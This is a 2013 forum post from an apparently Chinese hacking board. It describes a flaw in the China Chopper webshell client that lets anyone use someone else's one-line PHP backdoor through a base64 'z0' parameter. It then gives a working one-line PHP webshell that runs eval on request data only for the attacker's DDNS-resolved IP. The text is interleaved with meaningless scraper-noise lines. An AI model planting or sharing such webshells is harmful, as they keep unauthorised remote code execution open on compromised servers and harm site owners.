中国网络渗透测试联盟
标题:
中国菜刀 maicaidao 网站管理软件 0day
[打印本页]
作者:
admin
时间:
2013-7-26 12:45
标题:
中国菜刀 maicaidao 网站管理软件 0day
今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
& E0 t( p2 L$ Z4 C+ c3 U) x$ `
, c! r; u4 M/ T9 O4 `
就算你设置了密码,使用了eval($_REQUEST['moyo']);
' ]; P, f$ a" K; Z W6 |, V
/ R3 P( }' G' b* l B
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
2 Y& H$ V7 S0 S6 x% @: S
8 _1 O+ N( K7 w2 \4 R' H6 K
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
5 X1 R2 S( U6 y) I( ?/ b7 M' L
5 f, S* e" A; [$ [% F1 n) A& i
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
: ~4 {. H& |, i5 x4 ~' z) S2 p' C
: V D! Z. G( R- l
不知道是设计缺陷还是故意留的后门
1 U, J/ A$ c* A
. W* j* d8 J. \5 X8 q& ]
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
. k3 h( Z. f! N
( B3 e9 t$ D; n' p1 J4 D$ `# A
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
6 f) H, ?3 S& D; C, {! K7 Q: N
9 w# f: d/ h* `9 k& B* w
然后一句话后门这样写
/ t* j6 j1 r0 A- o* g) R; H" l
$ @: U* B& q+ c; o8 L
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
8 b6 g5 j: _: L" E9 ?
这样就可以让一句话后门只允许自己的电脑连接了
! p% N' l1 c2 I( N( L7 x- W
3 n: z0 {0 v6 ^! B8 H
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2